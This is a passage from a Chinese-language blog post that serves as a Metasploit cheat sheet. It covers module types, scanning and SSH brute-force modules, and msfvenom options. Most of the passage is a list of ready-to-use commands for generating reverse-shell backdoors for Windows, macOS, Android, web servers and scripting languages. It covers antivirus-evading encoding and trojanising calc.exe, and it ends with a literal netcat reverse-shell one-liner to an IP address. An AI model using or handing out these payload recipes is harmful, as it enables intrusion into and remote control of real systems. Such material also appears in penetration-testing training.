Exp和Poc</span><br><span class="line"></span><br><span class="line">- 通常 Exp 和 PoC 都是可执行的漏洞利用脚本&#x2F;程序 ，</span><br><span class="line">- 区别主要在于是否恶意，</span><br><span class="line"></span><br><span class="line">1. PoC 是 Proof of Concept (概念验证) 通常是内含无害的漏洞代码，比如弹出一个计算器什么的</span><br><span class="line">2. Exp  是 Exploit (漏洞利用) 通常是内含恶意的漏洞代码</span><br><span class="line"></span><br><span class="line">- 我们现在着重看一下exploits和payloads的内容，当然啦，这里的exploits正是我们刚刚提到的exp</span><br><span class="line">- exp在msf中来讲，其实本身并没有恶意行为，只是它会调用恶意payloads来进行测试，</span><br><span class="line"></span><br><span class="line">### 模块(modules)</span><br><span class="line"></span><br><span class="line">1. msf有六大模块</span><br></pre></td></tr></table></figure>

 <figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line"></span><br><span class="line">1.</span><br></pre></td></tr></table></figure>
 ls /opt/metasploit/modules
 auxiliary  evasion   nops      post
 encoders   exploits  payloads
 <figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line"></span><br><span class="line">- 预辅助模块（auxiliary)：执行信息收集，枚举，指纹探测，扫描等功能的辅助模块(没有payload的exploit模块)</span><br><span class="line">- 渗透模块(exploits)：利用系统漏洞进行攻击动作，此模块对应每一个具体漏洞的攻击方法（主动，被动）</span><br><span class="line">- 攻击荷载(payloads)：成功exploit之后，真正在目标系统中执行的代码或者命令</span><br><span class="line">- 后渗透模块(posts)：</span><br><span class="line">- 空字段模块(nops)：提高payload稳定性及维持大小</span><br><span class="line">- 编码模块(Encoders)：对payload进行加密，躲过av检查的模块</span><br><span class="line"></span><br><span class="line">1. exploits分类</span><br></pre></td></tr></table></figure>

 <figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line"></span><br><span class="line"></span><br></pre></td></tr></table></figure>
ls /opt/metasploit/modules/exploits
aix        bsdi        freebsd  mainframe  qnx
android    dialup      hpux     multi      solaris
apple_ios  example.rb  irix     netware    unix
bsd        firefox     linux    osx        windows
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line"></span><br><span class="line">payloads分类</span><br></pre></td></tr></table></figure>
</code></pre></li>
</ul>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line"></span><br><span class="line">1.</span><br></pre></td></tr></table></figure>
<p>   ls /opt/metasploit/modules/payloads<br>   singles  stagers  stages<br>   <figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><span class="line"></span><br><span class="line">- Single有点类似我们常说的大马，它不依赖任何环境或组件，只要它成功上传，它就可以实现它所有的功能。</span><br><span class="line">- stager有点类似我们常说的一句话，它只是用于建立连接。</span><br><span class="line">- stages完全是为了搭配前者使用，这时候出于黑客逻辑肯定会问，为什么不接着上传第一步的single，答：stages-payload的功能更倾向于底层，执行系统命令</span><br><span class="line"></span><br><span class="line">### 常用exp</span><br><span class="line"></span><br><span class="line">#### 扫描</span><br><span class="line"></span><br><span class="line">1. snmp枚举模块</span><br></pre></td></tr></table></figure></p>
   <figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line"></span><br><span class="line"></span><br></pre></td></tr></table></figure>
<p>12  auxiliary/scanner/snmp/snmp_enum                                      normal     Yes    SNMP Enumeration Module</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line"></span><br><span class="line">tcp扫描</span><br></pre></td></tr></table></figure>

<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line"></span><br><span class="line">1.</span><br></pre></td></tr></table></figure>
<p>   0  auxiliary/scanner/portscan/tcp                   normal  Yes    TCP Port Scanner<br>   <figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line"></span><br><span class="line">#### 爆破</span><br><span class="line"></span><br><span class="line">1. ssh爆破</span><br></pre></td></tr></table></figure></p>
   <figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line"></span><br><span class="line">1.</span><br></pre></td></tr></table></figure>
<p>   17  auxiliary/scanner/ssh/ssh_login                                              normal     Yes    SSH Login Check Scanner<br>   <figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br></pre></td><td class="code"><pre><span class="line"></span><br><span class="line">## 后门生成</span><br><span class="line"></span><br><span class="line">### msfvenom常用选项</span><br><span class="line"></span><br><span class="line">- -p, –payload           指定需要使用的payload(攻击荷载)。如果需要使用自定义的payload，请使用&#39;-&#39;或者stdin指定</span><br><span class="line">- -l, –list       [module_type]   列出指定模块的所有可用资源. 模块类型包括: payloads, encoders, nops, all</span><br><span class="line">- -n, –nopsled            为payload预先指定一个NOP滑动长度</span><br><span class="line">- -f, –format             指定输出格式 (使用 –help-formats 来获取msf支持的输出格式列表)</span><br><span class="line">- -e, –encoder    [encoder]       指定需要使用的encoder（编码器）</span><br><span class="line">- -a, –arch         指定payload的目标架构</span><br><span class="line">- –platform         指定payload的目标平台</span><br><span class="line">- -s, –space              设定有效攻击荷载的最大长度</span><br><span class="line">- -b, –bad-chars            设定规避字符集，比如: &#39;\x00\xff&#39;</span><br><span class="line">- -i, –iterations          指定payload的编码次数</span><br><span class="line">- -c, –add-code             指定一个附加的win32 shellcode文件</span><br><span class="line">- -x, –template             指定一个自定义的可执行文件作为模板</span><br><span class="line">- -k, –keep                       保护模板程序的动作，注入的payload作为一个新的进程运行</span><br><span class="line">- –payload-options            列举payload的标准选项</span><br><span class="line">- -o, –out                  保存payload</span><br><span class="line">- -v, –var-name             指定一个自定义的变量，以确定输出格式</span><br><span class="line">- –shellest                   最小化生成payload</span><br><span class="line">- -h, –help                       查看帮助选项</span><br><span class="line">- –help-formats               查看msf支持的输出格式列表</span><br><span class="line"></span><br><span class="line">### 生成payload</span><br><span class="line"></span><br><span class="line">- 生成payload，有有两个必须的选项：-p -f </span><br><span class="line"></span><br><span class="line">- 使用-p 来指定要使用的payload。</span><br><span class="line"></span><br><span class="line">- 可以使用下面的命令来查看所有msf可用的payload列表</span><br></pre></td></tr></table></figure></p>
  <figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line"></span><br><span class="line"></span><br></pre></td></tr></table></figure>
<p>./msfvenom -l payloads</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line"></span><br><span class="line">-p选项也支持使用使用自定义的payload，需要使用 “-“，比如:</span><br></pre></td></tr></table></figure>

<p>cat payload_file.bin | ./msfvenom -p - -a x86 –platform win -e x86/shikata_ga_nai -f raw</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line"></span><br><span class="line">使用-f 来指定payload的输出格式</span><br><span class="line"></span><br><span class="line">举例：</span><br></pre></td></tr></table></figure>

<p>./msfvenom -p windows/meterpreter/bind_tcp -f exe</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line"></span><br><span class="line">使用下面的命令，可以产看msf支持的输出格式</span><br></pre></td></tr></table></figure>

<p>./msfvenom –help-formats</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line"></span><br><span class="line">一个典型的msfvenom使用举例如下：</span><br></pre></td></tr></table></figure>

<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line"></span><br><span class="line">-</span><br></pre></td></tr></table></figure>
<p>  $ ./msfvenom -p windows/meterpreter/reverse_tcp lhost=[Attacker&#039;s IP] lport=4444 -f exe -o /tmp/my_payload.exe<br>  <figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line"></span><br><span class="line">### 对payload进行编码</span><br><span class="line"></span><br><span class="line">- 如果你使用了-b选项（设定了规避字符集），会自动调用编码器。</span><br><span class="line"></span><br><span class="line">- 其他情况下，你需要使用-e选项来使用编码模块，例如：</span><br></pre></td></tr></table></figure></p>
  <figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line"></span><br><span class="line"></span><br></pre></td></tr></table></figure>
<p>./msfvenom -p windows/meterpreter/bind_tcp -e x86/shikata_ga_nai -f raw</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line"></span><br><span class="line">可以使用下面的命令，来查看可用的编码器</span><br></pre></td></tr></table></figure>

<p>./msfvenom -l encoders</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line"></span><br><span class="line">你也可以使用-i选项进行多次编码。某些情况下，迭代编码可以起到规避杀毒软件的作用，但你需要知道，编码并没有使用一个真正意义上的AV规避方案。</span><br><span class="line"></span><br><span class="line">可以使用下面的命令来进行迭代编码：</span><br></pre></td></tr></table></figure>

<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line"></span><br><span class="line">-</span><br></pre></td></tr></table></figure>
<p>  ./msfvenom -p windows/meterpreter/bind_tcp -e x86/shikata_ga_nai -i 3<br>  <figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line"></span><br><span class="line">### 规避字符</span><br><span class="line"></span><br><span class="line">- 使用-b选项意味着在生成payload的时候对某些字符进行规避。当你使用这个选项的时候，msfvenom会自动的使用合适的编码器对payload进行编码，比如：</span><br></pre></td></tr></table></figure></p>
  <figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line"></span><br><span class="line">-</span><br></pre></td></tr></table></figure>
<p>  ./msfvenom -p windows/meterpreter/bind_tcp -b &#039;\x00&#039; -f raw<br>  <figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line"></span><br><span class="line">### 使用自定义可执行文件模板</span><br><span class="line"></span><br><span class="line">- 默认的，msfvenom使用的模板文件保存在msf&#x2F;data&#x2F;templates目录中，如果你想使用你自己的模板文件，你可以使用-x选项来指定，比如：</span><br></pre></td></tr></table></figure></p>
  <figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line"></span><br><span class="line">-</span><br></pre></td></tr></table></figure>
<p>  ./msfvenom -p windows/meterpreter/bind_tcp -x calc.exe -f exe &gt; new.exe<br>  <figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br></pre></td><td class="code"><pre><span class="line"></span><br><span class="line">- 这个命令将使用windows下计算器程序（calc.exe）作为可执行文件的模板生成payload。</span><br><span class="line"></span><br><span class="line">- 注意：如果你想要创建一个windows的x64的可执行文件模板来生成一个x64的payload，你只能使用exe格式的模板。</span><br><span class="line"></span><br><span class="line">- 使用-x选项经常和-k选项配合使用，-k选项会将你的payload作为一个新的进程运行。但目前这个选项只支持老版本的windows系统比如windows xp</span><br><span class="line"></span><br><span class="line">### 常用示例</span><br><span class="line"></span><br><span class="line">- 在攻击机的msf中启动监听模块，use exploit&#x2F;multi&#x2F;handler，并设置相应的payload，payload的选择取决于生成被控端文件用了什么模块，名字都是一样的。接着options设置好相应的参数。</span><br><span class="line"></span><br><span class="line">1. windows msf shell反弹</span><br></pre></td></tr></table></figure></p>
   <figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line"></span><br><span class="line"></span><br></pre></td></tr></table></figure>
<p>msfvenom -a x86 –platform Windows -p windows/meterpreter/reverse_tcp LHOST=攻击机IP LPORT=攻击机端口 -e x86/shikata_ga_nai -b ‘\x00\x0a\xff’ -i 3 -f exe -o payload.exe</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line"></span><br><span class="line">mac msf shell反弹</span><br></pre></td></tr></table></figure>

<p>msfvenom -a x86 –platform osx -p osx/x86/shell_reverse_tcp LHOST=攻击机IP LPORT=攻击机端口 -f macho -o payload.macho</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line"></span><br><span class="line">android msf shell反弹 &#x2F;&#x2F;需要签名</span><br></pre></td></tr></table></figure>

<p>msfvenom -a x86 –platform Android -p android/meterpreter/reverse_tcp LHOST=攻击机IP LPORT=攻击机端口 -f apk -o payload.apk</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line"></span><br><span class="line">powershell msf shell反弹</span><br></pre></td></tr></table></figure>

<p>msfvenom -a x86 –platform Windows -p windows/powershell_reverse_tcp LHOST=攻击机IP LPORT=攻击机端口 -e cmd/powershell_base64 -i 3 -f raw -o payload.ps1</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line"></span><br><span class="line">linux msf shell反弹</span><br></pre></td></tr></table></figure>

<p>msfvenom -a x86 –platform Linux -p linux/x86/meterpreter/reverse_tcp LHOST=攻击机IP LPORT=攻击机端口 -f elf -o payload.elf</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line"></span><br><span class="line">php msf shell反弹</span><br></pre></td></tr></table></figure>

<p>msfvenom -p php/meterpreter_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw &gt; shell.php cat shell.php | pbcopy &amp;&amp; echo ‘&lt;?php ‘ | tr -d ‘\n’ &gt; shell.php &amp;&amp; pbpaste &gt;&gt; shell.php</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line"></span><br><span class="line">aspx msf shell反弹</span><br></pre></td></tr></table></figure>

<p>msfvenom -a x86 –platform windows -p windows/meterpreter/reverse_tcp LHOST=攻击机IP LPORT=攻击机端口 -f aspx -o payload.aspx</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line"></span><br><span class="line">jsp msf shell反弹</span><br></pre></td></tr></table></figure>

<p>msfvenom –platform java -p java/jsp_shell_reverse_tcp LHOST=攻击机IP LPORT=攻击机端口 -f raw -o payload.jsp</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line"></span><br><span class="line">war msf shell反弹</span><br></pre></td></tr></table></figure>

<p>msfvenom -p java/jsp_shell_reverse_tcp LHOST=攻击机IP LPORT=攻击机端口 -f raw -o payload.war</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line"></span><br><span class="line">js msf shell反弹</span><br></pre></td></tr></table></figure>

<p>msfvenom -p nodejs/shell_reverse_tcp LHOST=攻击机IP LPORT=攻击机端口 -f raw -o payload.js</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line"></span><br><span class="line">python msf shell反弹</span><br></pre></td></tr></table></figure>

<p>msfvenom -p python/meterpreter/reverse_tcp LHOST=攻击机IP LPORT=攻击机端口 -f raw -o payload.py</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line"></span><br><span class="line">perl msf shell反弹</span><br></pre></td></tr></table></figure>

<p>msfvenom -p cmd/unix/reverse_perl LHOST=攻击机IP LPORT=攻击机端口 -f raw -o payload.pl</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line"></span><br><span class="line">ruby msf shell反弹</span><br></pre></td></tr></table></figure>

<p>msfvenom -p ruby/shell_reverse_tcp LHOST=攻击机IP LPORT=攻击机端口 -f raw -o payload.rb</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line"></span><br><span class="line">lua msf shell反弹</span><br></pre></td></tr></table></figure>

<p>msfvenom -p cmd/unix/reverse_lua LHOST=攻击机IP LPORT=攻击机端口 -f raw -o<br>payload.lua</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line"></span><br><span class="line">windows shellcode:</span><br></pre></td></tr></table></figure>

<p>msfvenom -a x86 –platform Windows -p windows/meterpreter/reverse_tcp LHOST=攻击机IP LPORT=攻击机端口 -f c</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line"></span><br><span class="line">linux shellcode</span><br></pre></td></tr></table></figure>

<p>msfvenom -a x86 –platform Linux -p linux/x86/meterpreter/reverse_tcp LHOST=攻击机IP LPORT=攻击机端口 -f c</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line"></span><br><span class="line">mac shellcode</span><br></pre></td></tr></table></figure>

<p>msfvenom -a x86 –platform osx -p osx/x86/shell_reverse_tcp LHOST=攻击机IP<br>LPORT=攻击机端口 -f c</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line"></span><br><span class="line">生成nc反弹一句话</span><br></pre></td></tr></table></figure>

<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line"></span><br><span class="line">1.</span><br></pre></td></tr></table></figure>
<p>   msfvenom -p cmd/unix/reverse_netcat lhost=192.168.1.102 lport=8888 R</p>
<p>   mkfifo /tmp/lerttd; nc 192.168.1.102 8888 0&lt;/tmp/lerttd | /bin/sh &gt;/tmp/lerttd 2&gt;&1; rm /tmp/lerttd</p>
<p>   ```</p>
<p>​                      </p>

      
       <hr><span style="font-style: italic;color: gray;"> 欢迎指出任何有错误或不够清晰的表达。可以在下面评论区评论，也可以邮件至 fkrvro@163.com </span>
    </div>
</article>







    




    </div>
    <div class="copyright">
        <p class="footer-entry">©2016-2019 Yelog</p>
<p class="footer-entry">Built with <a href="https://hexo.io/" target="_blank">Hexo</a> and <a href="https://github.com/yelog/hexo-theme-3-hexo" target="_blank">3-hexo</a> theme</p>

    </div>
    <div class="full-toc">
        <button class="full"><span class="min "></span></button>
<button class="post-toc-menu"><span class="post-toc-menu-icons"></span></button>
<div class="post-toc"><span class="post-toc-title">目录</span>
    <div class="post-toc-content">

    </div>
</div>
<a class="" id="rocket" ></a>

    </div>
</div>
<div class="acParent"></div>

</body>
<script src="/js/jquery.pjax.js?v=1.0.1" ></script>

<script src="/js/script.js?v=1.0.1" ></script>
<script>
    var img_resize = 'default';
    /*作者、标签的自动补全*/
    $(function () {
        $('.search').AutoComplete({
            'data': ['#tcp/ip协议','#http服务','#网络工具','#系统引导','#后渗透工具','#php','#Python','#文本处理','#web漏洞','#tcp/ip','#C&amp;C++','#shell编程','#文件处理','#面经','#注入工具','#环境搭建',],
            'itemHeight': 20,
            'width': 418
        }).AutoComplete('show');
    })
    function initArticle() {
        /*渲染对应的表格样式*/
        
            $(".post .pjax table").addClass("green_title");
        

        /*渲染打赏样式*/
        

        /*高亮代码块行号*/
        
        $('pre code').each(function(){
            var lines = $(this).text().split('\n').length - 1, widther='';
            if (lines>99) {
                widther = 'widther'
            }
            var $numbering = $('<ul/>').addClass('pre-numbering ' + widther).attr("unselectable","on");
            $(this).addClass('has-numbering ' + widther)
                    .parent()
                    .append($numbering);
            for(var i=1;i<=lines;i++){
                $numbering.append($('<li/>').text(i));
            }
        });
        

        /*访问数量*/
        
        $.getScript("//busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js");
        

        /*代码高亮，行号对齐*/
        $('.pre-numbering').css('line-height',$('.has-numbering').css('line-height'));

        
        
    }

    /*打赏页面隐藏与展示*/
    

</script>

<!--加入行号的高亮代码块样式-->

<style>
    pre{
        position: relative;
        margin-bottom: 24px;
        border-radius: 10px;
        border: 1px solid #e2dede;
        background: #FFF;
        overflow: hidden;
    }
    code.has-numbering{
        margin-left: 30px;
    }
    code.has-numbering.widther{
        margin-left: 35px;
    }
    .pre-numbering{
        margin: 0px;
        position: absolute;
        top: 0;
        left: 0;
        width: 20px;
        padding: 0.5em 3px 0.7em 5px;
        border-right: 1px solid #C3CCD0;
        text-align: right;
        color: #AAA;
        background-color: ;
    }
    .pre-numbering.widther {
        width: 35px;
    }
</style>

<!--自定义样式设置-->
<style>
    
    
    .nav {
        width: 542px;
    }
    .nav.fullscreen {
        margin-left: -542px;
    }
    .nav-left {
        width: 120px;
    }
    
    
    @media screen and (max-width: 1468px) {
        .nav {
            width: 492px;
        }
        .nav.fullscreen {
            margin-left: -492px;
        }
        .nav-left {
            width: 100px;
        }
    }
    
    
    @media screen and (max-width: 1024px) {
        .nav {
            width: 492px;
            margin-left: -492px
        }
        .nav.fullscreen {
            margin-left: 0;
        }
        .nav .hide-list.fullscreen {
            left: 492px
        }
    }
    
    @media screen and (max-width: 426px) {
        .nav {
            width: 100%;
        }
        .nav-left {
            width: 100%;
        }
    }
    
    
    .nav-right .title-list nav a .post-title, .nav-right .title-list #local-search-result a .post-title {
        color: #383636;
    }
    
    
    .nav-right .title-list nav a .post-date, .nav-right .title-list #local-search-result a .post-date {
        color: #5e5e5f;
    }
    
    
    .nav-right nav a.hover, #local-search-result a.hover{
        background-color: #e2e0e0;
    }
    
    

    /*列表样式*/
    
    .post .pjax article .article-entry>ol, .post .pjax article .article-entry>ul, .post .pjax article>ol, .post .pjax article>ul{
        border: #e2dede solid 1px;
        border-radius: 10px;
        padding: 10px 32px 10px 56px;
    }
    .post .pjax article .article-entry li>ol, .post .pjax article .article-entry li>ul,.post .pjax article li>ol, .post .pjax article li>ul{
        padding-top: 5px;
        padding-bottom: 5px;
    }
    .post .pjax article .article-entry>ol>li, .post .pjax article .article-entry>ul>li,.post .pjax article>ol>li, .post .pjax article>ul>li{
        margin-bottom: auto;
        margin-left: auto;
    }
    .post .pjax article .article-entry li>ol>li, .post .pjax article .article-entry li>ul>li,.post .pjax article li>ol>li, .post .pjax article li>ul>li{
        margin-bottom: auto;
        margin-left: auto;
    }
    

    /* 背景图样式 */
    
    


    /*引用块样式*/
    

    /*文章列表背景图*/
    
    .nav-right:before {
        content: ' ';
        display: block;
        position: absolute;
        left: 0;
        top: 0;
        width: 100%;
        height: 100%;
        opacity: 0.3;
        background: url("https://i.loli.net/2019/07/22/5d3521411f3f169375.png");
        background-repeat: no-repeat;
        background-position: 50% 0;
        -ms-background-size: cover;
        -o-background-size: cover;
        -moz-background-size: cover;
        -webkit-background-size: cover;
        background-size: cover;
    }
    

    
</style>







</html>
